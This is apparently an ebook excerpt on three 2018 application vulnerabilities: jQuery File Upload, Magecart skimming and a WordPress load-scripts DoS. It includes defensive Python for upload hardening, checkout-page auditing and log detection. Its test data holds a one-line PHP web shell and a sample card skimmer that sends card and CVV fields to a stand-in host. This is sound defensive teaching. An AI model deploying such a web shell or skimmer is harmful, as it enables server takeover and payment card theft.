10 dangerous app vulnerabilities to watch out for (free PDF)
Even though patches are often available, organizations commonly drag their feet—attracting threat actors to exploit unpatched installations. This ebook looks at WhiteHat Security’s top 10 list of vulnerabilities that surfaced last year.
From the ebook:
Security vulnerabilities are a reality of working in IT, with tech professionals tasked with ensuring that devices on the network are secured against the latest disclosed flaws. With thousands of vulnerabilities responsibly disclosed each year—to say nothing of those sold on the Dark Web—the task of maintaining the security integrity of the devices and applications running on your network can be daunting.
WhiteHat Security recently released its Top 10 Application Security Vulnerabilities of 2018 report, detailing the most commonly exploited application flaws of last year. Most, if not all, are still being exploited in the wild, and some sit in third-party components and libraries that you may not realize your software depends on.
Here are the top 10 app security vulnerabilities to watch out for in the coming year.
1. jQuery File Upload (CVE-2018-9206)
Though the jQuery File Upload vulnerability was identified only last year, attackers have used it to implant web shells and commandeer vulnerable servers since at least 2016, researchers at Akamai told our sister site ZDNet. The flaw is in the plugin's server-side PHP upload handler, which accepted any file the client sent and relied on an .htaccess rule to stop uploaded files from executing; Apache 2.3.9 and later ignore .htaccess by default, so on many hosts an attacker could upload a PHP file and simply request it. The plugin is the second most-starred jQuery project on GitHub, behind only the jQuery framework itself, and many forks and derived projects inherited the same handler.
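The upload-handling mistake above, and what a server-side check that does not depend on the web server's configuration looks like, as an added example. This is illustrative code written for this page, not the jQuery File Upload project's PHP handler; the directory paths, the allowlist of image types and the `Decision` type are assumptions.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Hypothetical locations: the first mirrors a 'files/' folder under the document root,
# the second is where a hardened handler keeps uploads instead (never directly servable).
UPLOAD_DIR_IN_WEBROOT = "/var/www/html/files"
UPLOAD_DIR_OUTSIDE_WEBROOT = "/var/lib/app/uploads"

# Extension allowlist paired with the magic bytes a file claiming that extension must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


@dataclass
class Decision:
    accepted: bool
    stored_as: Optional[str]
    reason: str


def naive_store(client_filename: str, data: bytes) -> Decision:
    """The as-shipped pattern: keep the client's name, write into the web root, and rely on
    the web server (an .htaccess rule) to refuse to execute whatever lands there.
    Once Apache stopped honouring .htaccess by default, 'shell.php' uploaded here simply ran."""
    path = os.path.join(UPLOAD_DIR_IN_WEBROOT, os.path.basename(client_filename))
    return Decision(True, path, "no server-side validation")


def hardened_store(client_filename: str, data: bytes) -> Decision:
    """Validate the file itself, choose our own name, and keep it out of the web root."""
    base = os.path.basename(client_filename)          # drop any directory traversal
    if "." not in base:
        return Decision(False, None, "no extension")
    ext = base.rsplit(".", 1)[1].lower()              # last extension only: 'x.php.jpg' -> 'jpg'
    if ext not in ALLOWED_TYPES:
        return Decision(False, None, f"extension .{ext} not allowed")
    if not data.startswith(ALLOWED_TYPES[ext]):       # bytes.startswith accepts a tuple
        return Decision(False, None, f"content is not a .{ext} file")
    if b"<?php" in data or b"<?=" in data:            # image/PHP polyglot
        return Decision(False, None, "PHP tag embedded in image data")
    server_name = f"{secrets.token_hex(16)}.{ext}"    # the client never controls the stored name
    return Decision(True, os.path.join(UPLOAD_DIR_OUTSIDE_WEBROOT, server_name), "ok")


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"           # constructed web-shell payload
    samples = [("shell.php", shell), ("shell.php.jpg", shell),
               ("pic.jpg", b"\xff\xd8\xff" + shell), ("pic.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 32)]
    for name, blob in samples:
        print(name, "| naive:", naive_store(name, blob).accepted, "| hardened:", hardened_store(name, blob))
```

The hardened path still needs a download handler that serves files from the outside-webroot directory with a fixed `Content-Type` and `Content-Disposition`, so that nothing in the upload directory is ever interpreted by PHP regardless of what the web server's override settings happen to be.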
2. Magecart credit card skimming
Magecart is the umbrella name for several criminal groups that inject JavaScript skimmers into ecommerce checkout pages, either directly or through a compromised third-party script, to capture payment card details as shoppers type them. Magecart skimmers were behind the Ticketmaster, British Airways, and Newegg breaches reported in 2018, and have also been delivered through the Shopper Approved ecommerce toolkit and through extensions for the Magento platform; OXO International disclosed a breach of this kind in January 2019.
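A baseline check a practitioner would run against a checkout page to catch the injection pattern described above, as an added example (not code from the article or from any of the sites named). It parses the page's script tags and reports scripts loaded from hosts outside an allowlist, CDN scripts shipped without Subresource Integrity, and inline scripts that both read form fields and send data over the network. The hostnames, the allowlist, and the sample page with its skimmer snippet are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the shop's own host plus the CDN it is known to load scripts from.
EXPECTED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Heuristics for an inline skimmer: reads field values AND sends data off somewhere.
FORM_READ = re.compile(r"(\.value\b|serialize\(|FormData\(|querySelector(?:All)?\([^)]*(?:card|cvv|cvc))", re.I)
NET_SEND = re.compile(r"(XMLHttpRequest|fetch\(|sendBeacon\(|new Image\(|\.src\s*=)", re.I)


class _ScriptCollector(HTMLParser):
    """Collects every <script> with its src, integrity attribute and inline body."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_checkout_page(html, page_host, allowed_hosts=EXPECTED_SCRIPT_HOSTS):
    """Return (script_index, finding, detail) tuples for scripts that deserve a look."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for i, s in enumerate(parser.scripts):
        if s["src"]:
            host = urlparse(s["src"]).hostname or page_host   # relative URL -> same origin
            if host not in allowed_hosts:
                findings.append((i, "unexpected-host", host))
            elif host != page_host and not s["integrity"]:
                findings.append((i, "missing-sri", host))
        elif FORM_READ.search(s["body"]) and NET_SEND.search(s["body"]):
            findings.append((i, "inline-skimmer-pattern", " ".join(s["body"].split())[:60]))
    return findings


# Constructed checkout page: a same-origin script, a CDN script with SRI, a CDN script without
# SRI, a script from a host the shop never approved, a skimmer inline script, and a harmless
# inline script. All hosts are hypothetical.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/jquery.min.js" integrity="sha384-EXAMPLEHASH"></script>
<script src="https://cdn.shop.example/analytics.js"></script>
<script src="https://static.skimmer-host.test/modernizr.js"></script>
</head><body>
<form id="payment"><input name="card_number"><input name="cvv"><button id="submit">Pay</button></form>
<script>
document.getElementById("submit").addEventListener("mouseup", function () {
  var data = JSON.stringify({n: document.querySelector("input[name=card_number]").value,
                             c: document.querySelector("input[name=cvv]").value});
  var x = new XMLHttpRequest();
  x.open("POST", "https://static.skimmer-host.test/gateway/app/dataprocessing");
  x.send(data);
});
</script>
<script>console.log("checkout page ready");</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_CHECKOUT_HTML, "shop.example"):
        print(finding)
```

Run this against a stored copy of the live checkout page on a schedule and diff the findings against the previous run; a new host or a previously pinned script that lost its `integrity` attribute is the signal. A Content Security Policy with `script-src` limited to the same allowlist, plus `report-uri`, turns the same check into something the browser enforces and reports on for every visitor.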
3. WordPress Denial of Service (CVE-2018-6989)
The ubiquity of WordPress makes the blogging platform a popular target for malicious actors. This vulnerability lets an unauthenticated user abuse wp-admin/load-scripts.php (and its sibling load-styles.php), which concatenates every script named in its load[] parameter into a single response: one request can name all of the roughly 180 registered script handles, and repeating it from a handful of clients quickly exhausts the server's CPU and I/O. WordPress declined to ship a core fix, saying the issue should be handled at the server or network level, so mitigation falls to rate limiting, a WAF rule that caps the length of load[], or restricting access to the loader scripts.
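Detection logic for the load-scripts.php abuse described above, run over constructed access-log lines, as an added example (this is not code from the article or from WordPress). It parses combined-format log lines, counts how many handles each loader request asks for, flags requests far larger than a real admin page needs, and tallies such requests per client. The threshold, the handle names, and the sample addresses are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)')

# Both loaders concatenate everything in load[] and neither requires a login.
LOADER_PATHS = ("/wp-admin/load-scripts.php", "/wp-admin/load-styles.php")
# Assumption: a real admin page asks for a few dozen handles; the public PoC asks for about 180.
MAX_HANDLES = 40


def count_handles(target):
    """Number of script/style handles a request asks the loader to build, or None for other URLs."""
    u = urlsplit(target)
    if u.path not in LOADER_PATHS:
        return None
    n = 0
    for key, values in parse_qs(u.query).items():
        if key == "load" or key.startswith("load["):   # parse_qs already decodes %5B%5D -> []
            n += sum(1 for v in values for h in v.split(",") if h)
    return n


def find_loader_abuse(lines, max_handles=MAX_HANDLES):
    """Return ([(ip, handle_count), ...] for oversized requests, Counter of such requests per IP)."""
    flagged, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        n = count_handles(m["target"])
        if n is not None and n > max_handles:
            flagged.append((m["ip"], n))
            per_ip[m["ip"]] += 1
    return flagged, per_ip


# Constructed log lines (RFC 5737 addresses). The first is what a normal wp-admin page load looks
# like; the next two are the DoS pattern, one client naming every handle over and over.
def _line(ip, target):
    return f'{ip} - - [10/Jan/2019:12:00:00 +0000] "GET {target} HTTP/1.1" 200 51234 "-" "Mozilla/5.0"'


ADMIN_HANDLES = ("jquery-core,jquery-migrate,utils,common,wp-a11y,sack,quicktags,colorpicker,"
                 "editor,wp-fullscreen-stub,wp-ajax-response,wp-api-request")
ATTACK_HANDLES = ",".join(f"handle-{i}" for i in range(181))   # stands in for the full handle list
SAMPLE_LOG = [
    _line("203.0.113.7", "/wp-admin/load-scripts.php?c=1&load%5B%5D=" + ADMIN_HANDLES + "&ver=5.0"),
    _line("198.51.100.20", "/wp-admin/load-scripts.php?c=1&load%5B%5D=" + ATTACK_HANDLES),
    _line("198.51.100.20", "/wp-admin/load-scripts.php?c=1&load%5B%5D=" + ATTACK_HANDLES),
    _line("203.0.113.7", "/wp-login.php"),
]

if __name__ == "__main__":
    flagged, per_ip = find_loader_abuse(SAMPLE_LOG)
    for ip, n in flagged:
        print(f"{ip} requested {n} handles in one loader call")
    print("oversized loader requests per client:", dict(per_ip))
```

The same handle count is the natural input to a WAF or reverse-proxy rule: reject loader requests above the threshold before PHP ever runs, and rate-limit the remaining loader traffic per client, since the loaders have no legitimate reason to be hit repeatedly by anyone who is not logged in to wp-admin.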